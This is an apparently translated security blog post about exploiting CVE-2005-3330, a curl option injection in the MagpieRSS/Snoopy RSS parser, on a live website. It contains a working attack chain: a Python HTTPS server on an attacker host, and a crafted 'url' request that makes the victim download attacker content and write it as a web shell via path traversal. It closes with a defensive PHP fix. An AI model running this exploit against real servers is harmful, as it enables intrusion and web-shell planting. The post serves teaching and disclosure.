Example of exploiting one old vulnerability

Hello everyone! I would like to talk about the exploitation of an old, well-known vulnerability, CVE-2005-3330, which we discovered in 2016 on a fairly popular website that has existed since 2006. I can only assume that someone simply forgot to remove the vulnerable framework from the site, although who knows, it may well still be in use.

The article may be useful for beginners learning information security.


So. The vulnerability is present in the RSS parser magpierss-0.72, which in turn uses the Snoopy library. An example exploit has been published, but, as often happens, it only hints at how the vulnerability can be exploited. The vulnerability description tells us that it manifests when user data is passed in, namely the https address of a third-party website in the GET parameter url.
Vulnerable function
    function _httpsrequest($url,$URI,$http_method,$content_type="",$body="")
    {
        if($this->passcookies && $this->_redirectaddr)
            $this->setcookies();

        $headers = array();

        $URI_PARTS = parse_url($URI);
        if(empty($url))
            $url = "/";
        // GET ... header not needed for curl
        //$headers[] = $http_method." ".$url." ".$this->_httpversion;
        if(!empty($this->agent))
            $headers[] = "User-Agent: ".$this->agent;
        if(!empty($this->host))
            $headers[] = "Host: ".$this->host;
        if(!empty($this->accept))
            $headers[] = "Accept: ".$this->accept;
        if(!empty($this->referer))
            $headers[] = "Referer: ".$this->referer;
        if(!empty($this->cookies))
        {
            if(!is_array($this->cookies))
                $this->cookies = (array)$this->cookies;

            reset($this->cookies);
            if ( count($this->cookies) > 0 ) {
                $cookie_str = 'Cookie: ';
                foreach ( $this->cookies as $cookieKey => $cookieVal ) {
                    $cookie_str .= $cookieKey."=".urlencode($cookieVal)."; ";
                }
                $headers[] = substr($cookie_str,0,-2);
            }
        }
        if(!empty($this->rawheaders))
        {
            if(!is_array($this->rawheaders))
                $this->rawheaders = (array)$this->rawheaders;
            while(list($headerKey,$headerVal) = each($this->rawheaders))
                $headers[] = $headerKey.": ".$headerVal;
        }
        if(!empty($content_type)) {
            if ($content_type == "multipart/form-data")
                $headers[] = "Content-type: $content_type; boundary=".$this->_mime_boundary;
            else
                $headers[] = "Content-type: $content_type";
        }
        if(!empty($body))
            $headers[] = "Content-length: ".strlen($body);
        if(!empty($this->user) || !empty($this->pass))
            $headers[] = "Authorization: BASIC ".base64_encode($this->user.":".$this->pass);

        for($curr_header = 0; $curr_header < count($headers); $curr_header++) {
            $cmdline_params .= " -H \"".$headers[$curr_header]."\"";
        }

        if(!empty($body))
            $cmdline_params .= " -d \"$body\"";

        if($this->read_timeout > 0)
            $cmdline_params .= " -m ".$this->read_timeout;

        $headerfile = uniqid(time());

        # accept self-signed certs
        $cmdline_params .= " -k";

        // Vulnerable line: $URI, built from the user-supplied url parameter, is only passed
        // through escapeshellcmd(), which escapes shell metacharacters but leaves spaces,
        // dashes and paired quotes untouched, so extra curl options embedded in the URL
        // (such as the -o used later in this article) reach curl's command line.
        exec($this->curl_path." -D \"/tmp/$headerfile\"".escapeshellcmd($cmdline_params)." ".escapeshellcmd($URI),$results,$return);
        // ... the remainder of the function is not shown on this page
    }

In order to exploit the vulnerability:

  1. We need a website that serves a page over https. Such a site can be built in Python in 5 seconds. Create a script https.py:

     # Python 2 standard library (BaseHTTPServer/SimpleHTTPServer): serves the
     # current directory over HTTPS. 'hacker_host' is a placeholder for the
     # address the server should listen on.
     import BaseHTTPServer, SimpleHTTPServer
     import ssl

     httpd = BaseHTTPServer.HTTPServer(('hacker_host', 443), SimpleHTTPServer.SimpleHTTPRequestHandler)
     httpd.socket = ssl.wrap_socket(httpd.socket, certfile='./server.pem', server_side=True)
     httpd.serve_forever()

    It needs a certificate to work. Create a self-signed certificate with the following command:

     openssl req -new -x509 -keyout server.pem -out server.pem -days 365 -nodes 

    In the directory served by https.py (its working directory), put an index.php script with any content of interest, for example:

     <?php echo("hello world!"); ?> 

  2. We need to know the path to the vulnerable script so that we can pass what we want in the url parameter:

     http://<host:port>/<path>/usr/lib/magpierss-0.72/scripts/magpie_debug.php?url= 

Now the vulnerability can be exploited. In our case, the request looked like this:

 http://<host:port>/<path>/usr/lib/magpierss-0.72/scripts/magpie_debug.php?url=https://<hacker_host>/index.php -o"cache/../../../../../shell.php" 

This makes an HTTP request to the vulnerable site <host:port> with a url parameter pointing to a page on the attacker's site, https://<hacker_host:hacker_port>/index.php. It was established experimentally that the site writes the contents of that index.php into the file shell.php in the site root. The victim site <host:port> now contains our shell.php script, which can be reached as follows:

 http://<host:port>/shell.php 

The recommended fix is to remove unused code and obsolete frameworks, and to check the site for backdoors, web shells, etc.
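The recommendation above is to remove the obsolete framework. Where a site still has to fetch a user-supplied feed URL, the following added example (my code, not MagpieRSS's or Snoopy's) shows the defensive pattern that removes the injection point seen in the vulnerable function: validate the URL and hand it to the curl extension as data, instead of building a shell command line for exec(). Host names in it are placeholders.

```php
<?php
// Added example, not part of MagpieRSS/Snoopy: fetch a user-supplied URL
// without ever building a shell command line, so there is no curl option
// injection to worry about. Host names below are placeholders.

// Accept only well-formed absolute http(s) URLs. FILTER_VALIDATE_URL rejects
// whitespace and quotes, so a value like the page's
// 'https://<hacker_host>/index.php -o"cache/../../../../../shell.php"'
// never reaches the fetch.
function is_fetchable_url(string $url): bool
{
    if (filter_var($url, FILTER_VALIDATE_URL) === false) {
        return false;
    }
    $scheme = strtolower((string) parse_url($url, PHP_URL_SCHEME));
    return in_array($scheme, ['http', 'https'], true);
}

// Fetch with the curl extension instead of exec(): the URL is passed as data,
// not as part of a command string, and curl is restricted to http(s).
function fetch_feed(string $url, int $timeout = 10): ?string
{
    if (!is_fetchable_url($url)) {
        return null;
    }
    $ch = curl_init($url);
    curl_setopt_array($ch, [
        CURLOPT_RETURNTRANSFER => true,
        CURLOPT_HEADER         => true,   // keep response headers, as "-D" did
        CURLOPT_FOLLOWLOCATION => false,  // do not follow redirects blindly
        CURLOPT_PROTOCOLS      => CURLPROTO_HTTP | CURLPROTO_HTTPS,
        CURLOPT_TIMEOUT        => $timeout,
        CURLOPT_SSL_VERIFYPEER => true,   // unlike the original "-k", verify the peer
    ]);
    $result = curl_exec($ch);
    curl_close($ch);
    return $result === false ? null : $result;
}

// The injected value from this article is refused; a plain feed URL is accepted.
var_dump(is_fetchable_url('https://hacker.example/index.php -o"cache/../../../../../shell.php"'));
var_dump(is_fetchable_url('https://feeds.example/rss.xml'));
```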

The site administration confirmed the vulnerability and began fixing it; they allowed this article to be published with identifying details removed.

Source: https://habr.com/ru/post/309064/
